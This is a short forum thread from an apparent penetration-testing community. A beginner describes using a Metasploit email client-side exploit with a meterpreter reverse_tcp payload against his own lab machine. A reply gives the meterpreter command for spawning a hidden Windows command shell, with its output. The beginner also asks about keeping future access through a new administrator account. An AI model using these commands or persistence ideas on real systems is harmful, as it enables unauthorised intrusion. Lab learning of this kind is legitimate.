Results 1 to 3 of 3

Thread: Email Exploit Command Prompt

  1. #1
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    10

    Post Email Exploit Command Prompt

    Hi to all,
    I'm very new to all these kind of stuff and I find it very interesting and helpful as I can secure my small office. Now going straight to the point.

    I tried my first pentest using metasploit email exploit (windows/email/ani_loadimage_chunksize ) Client side attack. I used my new machine as the victim and my old machine to boot up backtrack 3 beta Live CD. Everything went fine and i had typed in the right things. The victim checked his email and boom he was pawned. I got an active session with his windows box but i was not able to open a command prompt from his windows box as i dunno the right command.

    I used payload : windows/meterpreter/reverse_tcp (So that .dll file would be injected into memory and I am aware that "generic/shell_reverse_tcp" will give me a cmd but i prefer meterpreter) which doesn't pop up a shell/CMD. I'm using BackTrack 3 beta and i used the following command "execute -f cmd -c -H -i" but it didn't work as it doesn't recognize the command "execute" though it worked fine on BackTrack 2. So please can any tell me what is the command and also what I would need to do in order to have access to that comp again in future(Like create a Administrator U Account.. etc ). All suggestions are welcome and also kind of help.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    To be honest the meterpreter is a fairly complex payload. You may want to start with something easier. Here is the command to open a c:/ prompt

    meterpreter > execute -f cmd.exe -c -H -i
    Process 1744 created.
    Channel 89 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 19852001
    Microsoft Corp.
    C:\WINDOWS\system32>


    You may also want to read the .pdf

  3. #3
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    10

    Smile

    Quote Originally Posted by pureh@te View Post
    To be honest the meterpreter is a fairly complex payload. You may want to start with something easier. Here is the command to open a c:/ prompt

    meterpreter > execute -f cmd.exe -c -H -i
    Process 1744 created.
    Channel 89 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 19852001
    Microsoft Corp.
    C:\WINDOWS\system32>
    I'll start of with the basic one(Payload). Thanks a lot for your help much needed.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •